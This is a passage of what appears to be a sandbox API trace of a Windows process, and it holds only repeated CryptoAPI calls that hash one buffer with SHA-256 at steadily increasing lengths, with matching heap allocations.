	[0226.052] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737bb0
	[0226.052] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737bb0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737bb0, pdwDataLen=0x1284a8) returned 1
	[0226.052] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.052] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.052] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.052] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.052] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0226.052] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.052] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737bd8
	[0226.052] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737bd8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737bd8, pdwDataLen=0x1284a8) returned 1
	[0226.052] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.052] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.052] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.053] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.053] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0226.053] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381a0
	[0226.053] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x27381a0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27381a0, pdwDataLen=0x1284a8) returned 1
	[0226.053] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.053] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.053] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.053] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.053] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0226.053] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.053] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27380d8
	[0226.053] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27380d8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27380d8, pdwDataLen=0x1284a8) returned 1
	[0226.053] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.053] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.053] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.054] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.054] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0226.054] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738128
	[0226.054] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738128, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738128, pdwDataLen=0x1284a8) returned 1
	[0226.054] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.054] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.054] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.054] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.054] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0226.054] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.054] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738308
	[0226.054] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738308, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738308, pdwDataLen=0x1284a8) returned 1
	[0226.054] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.054] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.054] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.055] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.055] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0226.055] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738100
	[0226.055] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738100, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738100, pdwDataLen=0x1284a8) returned 1
	[0226.055] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.055] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.055] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.055] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.055] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0226.055] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.055] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738150
	[0226.055] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738150, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738150, pdwDataLen=0x1284a8) returned 1
	[0226.055] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.055] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.056] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.056] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.056] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0226.056] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738178
	[0226.056] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738178, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738178, pdwDataLen=0x1284a8) returned 1
	[0226.056] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.056] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.056] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.056] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.056] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0226.056] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.056] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738218
	[0226.057] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738218, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738218, pdwDataLen=0x1284a8) returned 1
	[0226.057] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.057] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.057] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.057] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.057] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0226.057] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738240
	[0226.057] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738240, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738240, pdwDataLen=0x1284a8) returned 1
	[0226.057] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.057] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.057] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.057] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.057] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0226.058] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738268
	[0226.058] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2738268, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738268, pdwDataLen=0x1284a8) returned 1
	[0226.058] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.058] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.058] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.058] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.058] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0226.058] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738290
	[0226.058] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2738290, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2738290, pdwDataLen=0x1284a8) returned 1
	[0226.058] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.058] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.058] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.058] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.059] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0226.059] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27382b8
	[0226.059] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27382b8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27382b8, pdwDataLen=0x1284a8) returned 1
	[0226.059] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.059] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.059] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.059] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.059] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0226.059] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.059] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c00
	[0226.059] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737c00, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737c00, pdwDataLen=0x1284a8) returned 1
	[0226.059] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.059] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.059] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.060] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.060] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0226.060] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c28
	[0226.060] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737c28, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737c28, pdwDataLen=0x1284a8) returned 1
	[0226.060] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.060] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.060] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.060] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.060] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0226.060] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c50
	[0226.060] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737c50, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737c50, pdwDataLen=0x1284a8) returned 1
	[0226.060] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.060] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.060] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.061] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.061] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0226.061] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d40
	[0226.061] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737d40, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737d40, pdwDataLen=0x1284a8) returned 1
	[0226.061] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.061] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.061] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.061] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.061] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0226.061] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.061] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737cf0
	[0226.061] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737cf0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737cf0, pdwDataLen=0x1284a8) returned 1
	[0226.061] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.061] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.061] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.062] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.062] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0226.062] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737d18
	[0226.062] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x2737d18, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737d18, pdwDataLen=0x1284a8) returned 1
	[0226.062] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.062] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.062] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.062] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.062] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0226.062] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.062] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737db8
	[0226.062] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x2737db8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x2737db8, pdwDataLen=0x1284a8) returned 1
	[0226.062] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.062] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.062] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.063] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.063] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0226.063] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27381f0
	[0226.063] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x27381f0, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x27381f0, pdwDataLen=0x1284a8) returned 1
	[0226.063] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.063] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.063] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.063] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.063] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0226.063] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb928
	[0226.063] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cb928, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cb928, pdwDataLen=0x1284a8) returned 1
	[0226.063] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.063] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.064] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.064] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.064] CryptHashData (hHash=0x22b69c0, pbData=0x2761c48, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0226.064] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbc70
	[0226.064] CryptGetHashParam (in: hHash=0x22b69c0, dwParam=0x2, pbData=0x26cbc70, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbc70, pdwDataLen=0x1284a8) returned 1
	[0226.064] CryptDestroyHash (hHash=0x22b69c0) returned 1
	[0226.064] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.064] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.064] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
	[0226.064] CryptHashData (hHash=0x22b6ac0, pbData=0x2761c48, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0226.064] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x4, pbData=0x1284a8, pdwDataLen=0x1284a4, dwFlags=0x0 | out: pbData=0x1284a8, pdwDataLen=0x1284a4) returned 1
	[0226.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cbce8
	[0226.064] CryptGetHashParam (in: hHash=0x22b6ac0, dwParam=0x2, pbData=0x26cbce8, pdwDataLen=0x1284a8, dwFlags=0x0 | out: pbData=0x26cbce8, pdwDataLen=0x1284a8) returned 1
	[0226.065] CryptDestroyHash (hHash=0x22b6ac0) returned 1
	[0226.065] CryptReleaseContext (hProv=0x225c98, dwFlags=0x0) returned 1
	[0226.065] CryptAcquireContextW (in: phProv=0x1284ac, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1284ac*=0x225c98) returned 1
	[0226.065] CryptCreateHash (in: hProv=0x225c98, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1284b0 | out: phHash=0x1284b0) returned 1
